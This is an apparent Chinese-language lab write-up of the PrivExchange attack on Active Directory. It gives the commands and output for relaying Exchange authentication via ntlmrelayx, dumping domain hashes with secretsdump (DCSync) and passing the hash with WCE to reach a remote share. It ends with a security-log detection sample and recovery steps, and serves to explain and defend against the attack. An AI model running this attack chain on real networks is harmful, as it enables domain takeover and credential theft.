exchange漏洞遇上DCShadow

摘要： 簡介 在大多數使用Active Directory和Exchange的組織中，Exchange伺服器具有如此高的許可權，即Exchange伺服器上的管理員足以升級到域管理員。此文章含有利用方法和攻擊日誌、及帳號恢復。 攻擊note # 開啟 中繼 服...

簡介

在大多數使用Active Directory和Exchange的組織中，Exchange伺服器具有如此高的許可權，即Exchange伺服器上的管理員足以升級到域管理員。此文章含有利用方法和攻擊日誌、及帳號恢復。

攻擊note

# 開啟 中繼 服務
root@kali:/opt/impacket# python ntlmrelayx.py -t ldap://192.168.136.2 --escalate-user extest
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server

[*] Setting up HTTP Server
[*] Servers started, waiting for connections
quested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] User privileges found: Create user[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User extest now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[-] ACL attack already performed. Refusing to continue
[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[-] ACL attack already performed. Refusing to continue

# 攻擊exchange
root@kali:/opt/PrivExchange# python privexchange.py-ah 192.168.135.88 mail.one.com -u extest -d one.corp
Password: 
INFO: Using attacker URL: http://192.168.135.88/privexchange/
INFO: Exchange returned HTTP status 200 - authentication was OK
INFO: API call was successful

# 用DCShadow 獲取域使用者hash
root@kali:/opt/impacket19# python secretsdump.pyone/[email protected] -just-dc
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
one.corp\administrator:500:xxxxxxxxx:xxxxxxxxx:::
Guest:501:xxxxxxxxx:xxxxxxxxx:::
krbtgt:502:xxxxxxxxx:xxxxxxxxx:::
DefaultAccount:503:xxxxxxxxx:xxxxxxxxx:::
one.corp\ocsadmin:1110:xxxxxxxxx:xxxxxxxxx:::
one.corp\jack.ma:1138:xxxxxxxxx:xxxxxxxxx:::
one.corp\tong.wu:1142:xxxxxxxxx:xxxxxxxxx:::
one.corp\chongxin.cai:1143:xxxxxxxxx:xxxxxxxxx:::
one.corp\yongming.wu:1145:xxxxxxxxx:xxxxxxxxx:::
one.corp\changwei.ma:1147:xxxxxxxxx:xxxxxxxxx:::
one.corp\shan.dai:1152:xxxxxxxxx:xxxxxxxxx:::
one.corp\jianhang.jin:1153:xxxxxxxxx:xxxxxxxxx:::
…………
……

hash注入

# 獲取hash後利用wce進行hash注入入侵任意帳號
C:\Users\C\Desktop\wce_v1_42beta_x32>wce -s changwei.ma:one.corp:xxxxxxxxx:xxxxxxxxx
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa ([email protected])
Use -h for help.

Changing NTLM credentials of current logon session (0008DE07h) to:
Username: changwei.ma
domain: one.corp
LMHash: xxxxxxxxx
NTHash: xxxxxxxxx
NTLM credentials successfully changed!
C:\Users\C\Desktop\wce_v1_42beta_x32>dir \\macw-pc\c$
 驅動器 \\macw-pc\c$ 中的卷是 Windows
 卷的序列號是 18A3-83B0

 \\macw-pc\c$ 的目錄

2018/04/12 週四07:38<DIR>PerfLogs
2018/12/20 週四14:08<DIR>Program Files
2019/01/16 週三11:21<DIR>Program Files (x86)
2019/01/10 週四10:32<DIR>Servyou
2018/11/29 週四14:36<DIR>Users
2019/01/08 週二15:15<DIR>Windows
2 個檔案33,165,918 位元組
7 個目錄 188,092,211,200 可用位元組

日誌分析

{
"computer_name": "DC06.one.corp",
"event_data": {
"AccessList": "%%7688\n\t\t\t\t",
"AccessMask": "0x100",
"AdditionalInfo": "-",
"HandleId": "0x0",
"ObjectName": "%{d0e4b839-7da5-4f94-8cb0-920f4ce499a9}",
"ObjectServer": "DS",
"ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
"OperationType": "Object Access",
"Properties": "%%7688\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
"SubjectDomainName": "ONE",
"SubjectLogonId": "0x3d857e",
"SubjectUserName": "extest",
"SubjectUserSid": "S-1-5-21-1528638276-348772823-1382602710-14867"
},
"event_id": 4662,
"keywords": [
"稽核成功"
],
"level": "資訊",
"log_name": "Security",
"opcode": "資訊",
"process_id": 664,
"provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}",
"record_number": "250045996",
"source_name": "Microsoft-Windows-Security-Auditing",
"task": "目錄服務訪問",
"thread_id": 760,
"type": "wineventlog"
}
// 根據objectType 或者 AccessList 來做告警

恢復

在 one.corp 林的屬性-安全選項卡會多出 extest使用者，並且具有 複製目錄更改和複製目錄更改所有項許可權 ，去掉許可權並刪除extest使用者

引用

• DCShadow攻擊技術分析

• abusing-exchange-one-api-call-away-from-domain-admin